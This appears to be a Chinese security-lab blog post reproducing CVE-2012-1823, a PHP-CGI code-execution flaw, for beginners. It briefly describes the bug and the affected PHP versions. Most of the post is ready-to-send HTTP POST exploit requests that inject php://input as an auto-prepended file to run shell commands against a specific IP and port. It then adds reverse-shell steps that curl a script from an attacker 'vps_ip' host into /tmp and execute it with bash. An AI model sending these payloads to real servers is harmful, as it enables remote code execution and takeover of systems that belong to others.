【初级】phpcgi 代码执行

CVE-2012-1823

漏洞描述:CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据

这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

影响版本:

php < 5.3.12

php < 5.4.2

参考资料:

POC:

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

漏洞复现

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

Host: 123.58.224.8:28794

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 31



<?php echo shell_exec("id"); ?>
图片[1]-【初级】phpcgi 代码执行-NGC660 安全实验室

反弹shell
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

Host: 123.58.224.8:28794

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 76



<?php echo shell_exec("curl http://vps_ip/shell.txt -o /tmp/1.sh"); ?>
图片[2]-【初级】phpcgi 代码执行-NGC660 安全实验室
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

Host: 123.58.224.8:28794

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 76



<?php echo shell_exec("bash /tmp/1.sh"); ?>
图片[3]-【初级】phpcgi 代码执行-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞10赏点小钱 分享